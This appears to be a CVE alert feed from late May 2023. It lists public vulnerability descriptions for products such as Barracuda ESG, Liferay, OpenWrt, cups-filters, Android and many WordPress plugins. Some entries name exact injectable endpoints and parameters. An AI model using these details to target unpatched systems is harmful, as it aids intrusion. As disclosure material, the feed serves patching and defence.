🚨 CVE-2023-31698Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo.🎖@cveNotify |
|
| 2023-05-25 16:58:14 |
🚨 CVE-2023-30503Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-05-25 16:58:13 |
🚨 CVE-2023-30505Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-05-25 16:58:12 |
🚨 CVE-2023-30506Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-05-25 13:58:17 |
🚨 CVE-2023-2881Storing Passwords in a Recoverable Format in GitHub repository pimcore/customer-data-framework prior to 3.3.10.🎖@cveNotify |
|
| 2023-05-25 13:58:16 |
🚨 CVE-2023-2882Generation of Incorrect Security Tokens vulnerability in CBOT Chatbot allows Token Impersonation, Privilege Abuse.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-05-25 13:58:15 |
🚨 CVE-2023-2883Authorization Bypass Through User-Controlled Key vulnerability in CBOT Chatbot allows Authentication Abuse, Authentication Bypass.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-05-25 13:58:14 |
🚨 CVE-2023-2884Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG), Use of Insufficiently Random Values vulnerability in CBOT Chatbot allows Signature Spoofing by Key Recreation.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-05-25 13:58:13 |
🚨 CVE-2023-2885Channel Accessible by Non-Endpoint vulnerability in CBOT Chatbot allows Adversary in the Middle (AiTM).This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-05-25 13:58:12 |
🚨 CVE-2023-2886Missing Origin Validation in WebSockets vulnerability in CBOT Chatbot allows Content Spoofing Via Application API Manipulation.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-05-24 22:58:15 |
🚨 CVE-2023-31544A stored cross-site scripting (XSS) vulnerability in alkacon-OpenCMS v11.0.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field under the Upload Image module.🎖@cveNotify |
|
| 2023-05-24 20:58:37 |
🚨 CVE-2023-27979A CWE-345: Insufficient Verification of Data Authenticity vulnerability exists in the Data Server that could allow the renaming of files in the IGSS project report directory, this could lead to denial of service when an attacker sends specific crafted messages to the Data Server TCP port. Affected Products: IGSS Data Server(IGSSdataServer.exe)(V16.0.0.23040 and prior), IGSS Dashboard(DashBoard.exe)(V16.0.0.23040 and prior), Custom Reports(RMS16.dll)(V16.0.0.23040 and prior).🎖@cveNotify |
|
| 2023-05-24 20:58:36 |
🚨 CVE-2023-2868A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances.🎖@cveNotify |
|
| 2023-05-24 20:58:35 |
🚨 CVE-2023-2875A vulnerability, which was classified as problematic, was found in eScan Antivirus 22.0.1400.2443. Affected is the function 0x22E008u in the library PROCOBSRVESX.SYS of the component IoControlCode Handler. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-229854 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-24 20:58:34 |
🚨 CVE-2023-2870A vulnerability was found in EnTech Monitor Asset Manager 2.9. It has been declared as problematic. Affected by this vulnerability is the function 0x80002014 of the component IoControlCode Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier VDB-229849 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-24 20:58:29 |
🚨 CVE-2023-2871A vulnerability was found in FabulaTech USB for Remote Desktop 6.1.0.0. It has been rated as problematic. Affected by this issue is the function 0x220448/0x220420/0x22040c/0x220408 of the component IoControlCode Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. VDB-229850 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-24 20:58:28 |
🚨 CVE-2023-2873A vulnerability classified as critical was found in Twister Antivirus 8. This vulnerability affects the function 0x804f2143/0x804f217f/0x804f214b/0x80800043 in the library filppd.sys of the component IoControlCode Handler. The manipulation leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229852. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-24 20:58:27 |
🚨 CVE-2023-33980Bramble Synchronisation Protocol (BSP) in Briar before 1.4.22 allows attackers to cause a denial of service (repeated application crashes) via a series of long messages to a contact.🎖@cveNotify |
|
| 2023-05-24 20:58:26 |
🚨 CVE-2023-33981Briar before 1.4.22 allows attackers to spoof other users' messages in a blog, forum, or private group, but each spoofed message would need to be an exact duplicate of a legitimate message displayed alongside the spoofed one.🎖@cveNotify |
|
| 2023-05-24 20:58:22 |
🚨 CVE-2023-33982Bramble Handshake Protocol (BHP) in Briar before 1.5.3 is not forward secure: eavesdroppers can decrypt network traffic between two accounts if they later compromise both accounts. NOTE: the eavesdropping is typically impractical because BHP runs over an encrypted session that uses the Tor hidden service protocol.🎖@cveNotify |
|
| 2023-05-24 20:58:21 |
🚨 CVE-2023-31702SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1.🎖@cveNotify |
|
| 2023-05-24 20:58:20 |
🚨 CVE-2023-31703Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter.🎖@cveNotify |
|
| 2023-05-24 20:58:19 |
🚨 CVE-2023-1934The PnPSCADA system, a product of SDG Technologies CC, is afflicted by a critical unauthenticated error-based PostgreSQL Injection vulnerability. Present within the hitlogcsv.jsp endpoint, this security flaw permits unauthenticated attackers to engage with the underlying database seamlessly and passively. Consequently, malicious actors could gain access to vital information, such as Industrial Control System (ICS) and OT data, alongside other sensitive records like SMS and SMS Logs. The unauthorized database access exposes compromised systems to potential manipulation or breach of essential infrastructure data, highlighting the severity of this vulnerability.🎖@cveNotify |
|
| 2023-05-24 20:58:15 |
🚨 CVE-2023-30256Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.🎖@cveNotify |
|
| 2023-05-24 20:58:14 |
🚨 CVE-2023-27350This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.🎖@cveNotify |
|
| 2023-05-24 20:58:13 |
🚨 CVE-2022-41544GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.🎖@cveNotify |
|
| 2023-05-24 20:58:12 |
🚨 CVE-2022-31137Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Attackers need not be authenticated to exploit this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-24 18:58:14 |
🚨 CVE-2023-33944Cross-site scripting (XSS) vulnerability in Layout module in Liferay Portal 7.3.4 through 7.4.3.68, and Liferay DXP 7.3 before update 24, and 7.4 before update 69 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a container type layout fragment's `URL` text field.🎖@cveNotify |
|
| 2023-05-24 18:58:13 |
🚨 CVE-2023-33945SQL injection vulnerability in the upgrade process for SQL Server in Liferay Portal 7.3.1 through 7.4.3.17, and Liferay DXP 7.3 before update 6, and 7.4 before update 18 allows attackers to execute arbitrary SQL commands via the name of a database table's primary key index. This vulnerability is only exploitable when chained with other attacks. To exploit this vulnerability, the attacker must modify the database and wait for the application to be upgraded.🎖@cveNotify |
|
| 2023-05-24 16:58:58 |
🚨 CVE-2023-33943Cross-site scripting (XSS) vulnerability in the Account module in Liferay Portal 7.4.3.21 through 7.4.3.62, and Liferay DXP 7.4 update 21 through 62 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user's (1) First Name, (2) Middle Name, (3) Last Name, or (4) Job Title text field.🎖@cveNotify |
|
| 2023-05-24 16:58:56 |
🚨 CVE-2022-29583** DISPUTED ** service_windows.go in the kardianos service package for Go omits quoting that is sometimes needed for execution of a Windows service executable from the intended directory. NOTE: this finding could not be reproduced by its original reporter or by others.🎖@cveNotify |
|
| 2023-05-24 16:58:54 |
🚨 CVE-2023-20694In preloader, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07733998 / ALPS07874388 (For MT6880 and MT6890 only); Issue ID: ALPS07733998 / ALPS07874388 (For MT6880 and MT6890 only).🎖@cveNotify |
|
| 2023-05-24 16:58:52 |
🚨 CVE-2023-20695In preloader, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07734012 / ALPS07874363 (For MT6880, MT6890, MT6980 and MT6990 only); Issue ID: ALPS07734012 / ALPS07874363 (For MT6880, MT6890, MT6980 and MT6990 only).🎖@cveNotify |
|
| 2023-05-24 16:58:50 |
🚨 CVE-2023-20696In preloader, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07856356 / ALPS07874388 (For MT6880 and MT6890 only); Issue ID: ALPS07856356 / ALPS07874388 (For MT6880 and MT6890 only).🎖@cveNotify |
|
| 2023-05-24 16:58:49 |
🚨 CVE-2023-20726In mnld, there is a possible leak of GPS location due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07735968 / ALPS07884552 (For MT6880, MT6890, MT6980, MT6980D and MT6990 only); Issue ID: ALPS07735968 / ALPS07884552 (For MT6880, MT6890, MT6980, MT6980D and MT6990 only).🎖@cveNotify |
|
| 2023-05-24 16:58:47 |
🚨 CVE-2023-32073WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3.🎖@cveNotify |
|
| 2023-05-24 16:58:45 |
🚨 CVE-2023-24182LuCI openwrt-22.03 branch git-22.361.69894-438c598 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component /system/sshkeys.js.🎖@cveNotify |
|
| 2023-05-24 16:58:44 |
🚨 CVE-2022-38333Openwrt before v21.02.3 and Openwrt v22.03.0-rc6 were discovered to contain two skip loops in the function header_value(). This vulnerability allows attackers to access sensitive information via a crafted HTTP request.🎖@cveNotify |
|
| 2023-05-24 16:58:42 |
🚨 CVE-2021-45905OpenWrt 21.02.1 allows XSS via the Traffic Rules Name screen.🎖@cveNotify |
|
| 2023-05-24 16:58:40 |
🚨 CVE-2021-45906OpenWrt 21.02.1 allows XSS via the NAT Rules Name screen.🎖@cveNotify |
|
| 2023-05-24 16:58:38 |
🚨 CVE-2021-45904OpenWrt 21.02.1 allows XSS via the Port Forwards Add Name screen.🎖@cveNotify |
|
| 2023-05-24 16:58:36 |
🚨 CVE-2021-32019There is missing input validation of host names displayed in OpenWrt before 19.07.8. The Connection Status page of the luci web-interface allows XSS, which can be used to gain full control over the affected system via ICMP.🎖@cveNotify |
|
| 2023-05-24 16:58:34 |
🚨 CVE-2021-33425A stored cross-site scripting (XSS) vulnerability was discovered in the Web Interface for OpenWRT LuCI version 19.07 which allows attackers to inject arbitrary Javascript in the OpenWRT Hostname via the Hostname Change operation.🎖@cveNotify |
|
| 2023-05-24 16:58:32 |
🚨 CVE-2021-28961applications/luci-app-ddns/luasrc/model/cbi/ddns/detail.lua in the DDNS package for OpenWrt 19.07 allows remote authenticated users to inject arbitrary commands via POST requests.🎖@cveNotify |
|
| 2023-05-24 16:58:31 |
🚨 CVE-2021-22161In OpenWrt 19.07.x before 19.07.7, when IPv6 is used, a routing loop can occur that generates excessive network traffic between an affected device and its upstream ISP's router. This occurs when a link prefix route points to a point-to-point link, a destination IPv6 address belongs to the prefix and is not a local IPv6 address, and a router advertisement is received with at least one global unique IPv6 prefix for which the on-link flag is set. This affects the netifd and odhcp6c packages.🎖@cveNotify |
|
| 2023-05-24 16:58:29 |
🚨 CVE-2019-25015LuCI in OpenWrt 18.06.0 through 18.06.4 allows stored XSS via a crafted SSID.🎖@cveNotify |
|
| 2023-05-24 16:58:28 |
🚨 CVE-2020-28951libuci in OpenWrt before 18.06.9 and 19.x before 19.07.5 may encounter a use after free when using malicious package names. This is related to uci_parse_package in file.c and uci_strdup in util.c.🎖@cveNotify |
|
| 2023-05-24 16:58:26 |
🚨 CVE-2019-19945uhttpd in OpenWrt through 18.06.5 and 19.x through 19.07.0-rc2 has an integer signedness error. This leads to out-of-bounds access to a heap buffer and a subsequent crash. It can be triggered with an HTTP POST request to a CGI script, specifying both "Transfer-Encoding: chunked" and a large negative Content-Length value.🎖@cveNotify |
|
| 2023-05-24 16:58:24 |
🚨 CVE-2020-7248libubox in OpenWrt before 18.06.7 and 19.x before 19.07.1 has a tagged binary data JSON serialization vulnerability that may cause a stack based buffer overflow.🎖@cveNotify |
|
| 2023-05-24 15:58:58 |
🚨 CVE-2023-29930An issue was found in Genesys CIC Polycom phone provisioning TFTP Server all version allows a remote attacker to execute arbitrary code via the login crednetials to the TFTP server configuration page.🎖@cveNotify |
|
| 2023-05-24 15:58:57 |
🚨 CVE-2023-2065Authorization Bypass Through User-Controlled Key vulnerability in Armoli Technology Cargo Tracking System allows Authentication Abuse, Authentication Bypass.This issue affects Cargo Tracking System: before 3558f28 .🎖@cveNotify |
|
| 2023-05-24 15:58:56 |
🚨 CVE-2023-33009A buffer overflow vulnerability in the notification function in Zyxel ATP series firmware versions 4.32 through 5.36 Patch 1, USG FLEX series firmware versions 4.50 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.25 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.25 through 5.36 Patch 1, VPN series firmware versions 4.30 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.25 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device.🎖@cveNotify |
|
| 2023-05-24 15:58:55 |
🚨 CVE-2023-33010A buffer overflow vulnerability in the ID processing function in Zyxel ATP series firmware versions 4.32 through 5.36 Patch 1, USG FLEX series firmware versions 4.50 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.25 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.25 through 5.36 Patch 1, VPN series firmware versions 4.30 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.25 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device.🎖@cveNotify |
|
| 2023-05-24 15:58:53 |
🚨 CVE-2023-33937Stored cross-site scripting (XSS) vulnerability in Form widget configuration in Liferay Portal 7.1.0 through 7.3.0, and Liferay DXP 7.1 before fix pack 18, and 7.2 before fix pack 5 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a form's `name` field.🎖@cveNotify |
|
| 2023-05-24 15:58:52 |
🚨 CVE-2023-2750Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cityboss E-municipality allows SQL Injection.This issue affects E-municipality: before 6.05.🎖@cveNotify |
|
| 2023-05-24 15:58:51 |
🚨 CVE-2023-2862A vulnerability, which was classified as problematic, was found in SiteServer CMS up to 7.2.1. Affected is an unknown function of the file /api/stl/actions/search. The manipulation of the argument ajaxDivId leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-229818 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-24 15:58:50 |
🚨 CVE-2023-2863A vulnerability has been found in Simple Design Daily Journal 1.012.GP.B on Android and classified as problematic. Affected by this vulnerability is an unknown functionality of the component SQLite Database. The manipulation leads to cleartext storage in a file or on disk. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229819.🎖@cveNotify |
|
| 2023-05-24 13:58:45 |
🚨 CVE-2023-2864A vulnerability was found in SourceCodester Online Jewelry Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file customer.php of the component POST Parameter Handler. The manipulation of the argument Custid leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229820.🎖@cveNotify |
|
| 2023-05-24 13:58:44 |
🚨 CVE-2023-2862A vulnerability, which was classified as problematic, was found in SiteServer CMS up to 7.2.1. Affected is an unknown function of the file /api/stl/actions/search. The manipulation of the argument ajaxDivId leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-229818 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-24 13:58:43 |
🚨 CVE-2023-2863A vulnerability has been found in Simple Design Daily Journal 1.012.GP.B on Android and classified as problematic. Affected by this vulnerability is an unknown functionality of the component SQLite Database. The manipulation leads to cleartext storage in a file or on disk. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229819.🎖@cveNotify |
|
| 2023-05-24 10:58:59 |
🚨 CVE-2023-2859Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-05-24 10:58:58 |
🚨 CVE-2022-0357Unquoted Search Path or Element vulnerability in the Vulnerability Scan component of Bitdefender Total Security, Bitdefender Internet Security, and Bitdefender Antivirus Plus allows an attacker to elevate privileges to SYSTEM.This issue affects:Bitdefender Total Securityversions prior to 26.0.10.45.Bitdefender Internet Securityversions prior to 26.0.10.45.Bitdefender Antivirus Plusversions prior to 26.0.10.45.🎖@cveNotify |
|
| 2023-05-24 10:58:57 |
🚨 CVE-2023-1424Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to cause a denial of service (DoS) condition or execute malicious code on a target product by sending specially crafted packets. A system reset of the product is required for recovery from a denial of service (DoS) condition and malicious code execution.🎖@cveNotify |
|
| 2023-05-24 10:58:56 |
🚨 CVE-2023-24805cups-filters contains backends, filters, and other software required to get the cups printing service working on operating systems other than macos. If you use the Backend Error Handler (beh) to create an accessible network printer, this security vulnerability can cause remote code execution. `beh.c` contains the line `retval = system(cmdline) >> 8;` which calls the `system` command with the operand `cmdline`. `cmdline` contains multiple user controlled, unsanitized values. As a result an attacker with network access to the hosted print server can exploit this vulnerability to inject system commands which are executed in the context of the running server. This issue has been addressed in commit `8f2740357` and is expected to be bundled in the next release. Users are advised to upgrade when possible and to restrict access to network printers in the meantime.🎖@cveNotify |
|
| 2023-05-24 10:58:55 |
🚨 CVE-2023-2610Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.1532.🎖@cveNotify |
|
| 2023-05-24 10:58:54 |
🚨 CVE-2023-2609NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1531.🎖@cveNotify |
|
| 2023-05-24 10:58:53 |
🚨 CVE-2023-2426Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 9.0.1499.🎖@cveNotify |
|
| 2023-05-24 05:58:32 |
🚨 CVE-2023-21116In verifyReplacingVersionCode of InstallPackageHelper.java, there is a possible way to downgrade system apps below system image version due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-256202273🎖@cveNotify |
|
| 2023-05-24 05:58:31 |
🚨 CVE-2023-21107In retrieveAppEntry of NotificationAccessDetails.java, there is a missing permission check. This could lead to local escalation of privilege across user boundaries with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-259385017🎖@cveNotify |
|
| 2023-05-24 05:58:30 |
🚨 CVE-2023-21110In several functions of SnoozeHelper.java, there is a possible way to grant notifications access due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-258422365🎖@cveNotify |
|
| 2023-05-24 05:58:26 |
🚨 CVE-2023-21111In several functions of PhoneAccountRegistrar.java, there is a possible way to prevent an access to emergency services due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-256819769🎖@cveNotify |
|
| 2023-05-24 05:58:25 |
🚨 CVE-2023-21104In applySyncTransaction of WindowOrganizer.java, a missing permission check could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12L Android-13Android ID: A-259938771🎖@cveNotify |
|
| 2023-05-24 05:58:24 |
🚨 CVE-2023-2494The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.🎖@cveNotify |
|
| 2023-05-24 05:58:20 |
🚨 CVE-2023-2496The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized arbitrary file uploads due to an improper capability check on the 'validate_upload' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2023-05-24 05:58:19 |
🚨 CVE-2023-31759Weak Security in the 433MHz keyfob of Kerui W18 Alarm System v1.0 allows attackers to gain full access via a code replay attack.🎖@cveNotify |
|
| 2023-05-24 05:58:18 |
🚨 CVE-2023-31762Weak security in the transmitter of Digoo DG-HAMB Smart Home Security System v1.0 allows attackers to gain full access to the system via a code replay attack.🎖@cveNotify |
|
| 2023-05-24 05:58:14 |
🚨 CVE-2023-21102In __efi_rt_asm_wrapper of efi-rt-wrapper.S, there is a possible bypass of shadow stack protection due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-260821414References: Upstream kernel🎖@cveNotify |
|
| 2023-05-24 05:58:13 |
🚨 CVE-2023-20914In onSetRuntimePermissionGrantStateByDeviceAdmin of AdminRestrictedPermissionsUtils.java, there is a possible way for the work profile to read SMS messages due to a permissions bypass. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-189942529🎖@cveNotify |
|
| 2023-05-24 00:58:17 |
🚨 CVE-2023-31747Wondershare Filmora 12 (Build 12.2.1.2088) was discovered to contain an unquoted service path vulnerability via the component NativePushService. This vulnerability allows attackers to launch processes with elevated privileges.🎖@cveNotify |
|
| 2023-05-24 00:58:16 |
🚨 CVE-2023-32697SQLite JDBC is a library for accessing and creating SQLite database files in Java. Sqlite-jdbc addresses a remote code execution vulnerability via JDBC URL. This issue impacting versions 3.6.14.1 through 3.41.2.1 and has been fixed in version 3.41.2.2.🎖@cveNotify |
|
| 2023-05-24 00:58:15 |
🚨 CVE-2022-45770Improper input validation in adgnetworkwfpdrv.sys in Adguard For Windows x86 through 7.11 allows local privilege escalation.🎖@cveNotify |
|
| 2023-05-24 00:58:14 |
🚨 CVE-2023-28015The HCL Domino AppDev Pack IAM service is susceptible to a User Account Enumeration vulnerability. During a failed login attempt a difference in messages could allow an attacker to determine if the user is valid or not. The attacker could use this information to focus a brute force attack on valid users.🎖@cveNotify |
|
| 2023-05-24 00:58:13 |
🚨 CVE-2023-31726AList 3.15.1 is vulnerable to Incorrect Access Control, which can be exploited by attackers to obtain sensitive information.🎖@cveNotify |
|
| 2023-05-23 22:58:14 |
🚨 CVE-2019-10692In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.🎖@cveNotify |
|
| 2023-05-23 22:58:13 |
🚨 CVE-2023-32243Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.🎖@cveNotify |
|
| 2023-05-23 22:58:12 |
🚨 CVE-2023-2676A vulnerability, which was classified as critical, has been found in H3C R160 V1004004. Affected by this issue is some unknown functionality of the file /goForm/aspForm. The manipulation of the argument go leads to stack-based buffer overflow. The exploit has been disclosed to the public and may be used. VDB-228890 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-23 20:58:21 |
🚨 CVE-2023-29862An issue found in Agasio-Camera device version not specified allows a remote attacker to execute arbitrary code via the check and authLevel parameters.🎖@cveNotify |
|
| 2023-05-23 20:58:20 |
🚨 CVE-2023-2009Plugin does not sanitize and escape the URL field in the Pretty Url WordPress plugin through 1.5.4 settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-05-23 20:58:16 |
🚨 CVE-2023-2179The WooCommerce Order Status Change Notifier WordPress plugin through 1.1.0 does not have authorisation and CSRF when updating status orders via an AJAX action available to any authenticated users, which could allow low privilege users such as subscriber to update arbitrary order status, making them paid without actually paying for them for example🎖@cveNotify |
|
| 2023-05-23 20:58:15 |
🚨 CVE-2023-2180The KIWIZ Invoices Certification & PDF System WordPress plugin through 2.1.3 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/downlaod arbitrary files, as well as perform PHAR unserialization (assuming they can upload a file on the server)🎖@cveNotify |
|
| 2023-05-23 20:58:14 |
🚨 CVE-2023-32700LuaTeX before 1.17.0 allows execution of arbitrary shell commands when compiling a TeX file obtained from an untrusted source. This occurs because luatex-core.lua lets the original io.popen be accessed. This also affects TeX Live before 2023 r66984 and MiKTeX before 23.5.🎖@cveNotify |
|
| 2023-05-23 20:58:13 |
🚨 CVE-2023-31607An issue in the __libc_malloc component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.🎖@cveNotify |
|
| 2023-05-23 18:58:20 |
🚨 CVE-2023-33599EasyImages2.0 ? 2.8.1 is vulnerable to Cross Site Scripting (XSS) via viewlog.php.🎖@cveNotify |
|
| 2023-05-23 18:58:19 |
🚨 CVE-2023-33617An OS Command Injection vulnerability in Parks Fiberlink 210 firmware version V2.1.14_X000 was found via the /boaform/admin/formPing target_addr parameter.🎖@cveNotify |
|
| 2023-05-23 18:58:18 |
🚨 CVE-2023-0644The Push Notifications for WordPress by PushAssist WordPress plugin through 3.0.8 does not sanitise and escape various parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-05-23 18:58:14 |
🚨 CVE-2023-0361A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.🎖@cveNotify |
|
| 2023-05-23 18:58:13 |
🚨 CVE-2022-41687Insecure inherited permissions in the HotKey Services for some Intel(R) NUC P14E Laptop Element software for Windows 10 before version 1.1.44 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-23 18:58:12 |
🚨 CVE-2023-0600The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 6.9 does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.🎖@cveNotify |
|
| 2023-05-23 17:58:18 |
🚨 CVE-2020-11514The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to update arbitrary WordPress metadata, including the ability to escalate or revoke administrative privileges for existing users via the unsecured rankmath/v1/updateMeta REST API endpoint.🎖@cveNotify |
|
| 2023-05-23 17:58:14 |
